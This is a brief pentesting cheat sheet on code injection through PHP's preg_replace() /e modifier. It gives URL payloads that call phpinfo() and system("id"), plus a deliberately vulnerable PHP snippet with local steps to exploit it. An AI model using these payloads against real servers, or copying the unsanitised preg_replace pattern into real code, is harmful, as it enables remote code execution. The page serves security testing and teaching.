preg_replace() in PHP
The preg_replace() function in PHP returns a string or array of strings where all matches of a pattern or list of patterns found in the input are replaced with substrings.
The /e modifier will cause the function preg_replace() to evaluate new value as 'PHP code' before submitting the substitution. Note thatPCRE_REPLACE_EVAL
(/e
) has been deprecated as of PHP 5.5.0.
How to detect and validate
# You can guess that this could use a preg_replace function.
index.php?pat=/as/&rep=As&sub=as your wish exploit
# payload - see the e modifier in pat parameter and php function in rep parameter
payload: index.php?pat=/a/e&rep=phpinfo();&sub=abc
How to RCE
payload: index.php?pat=/a/e&rep=system("id");&sub=abc
Another example
<?php
$in = 'Somewhere, something incredible is waiting to be known';
echo preg_replace($_GET['replace'], $_GET['with'], $in);
?>
# Create a php file including the code above
# Run php server
# php -S localhost:8000
# Access to the server with the following
# http://localhost:8000/foo.php?replace=/known/e&with=system("id")
Last updated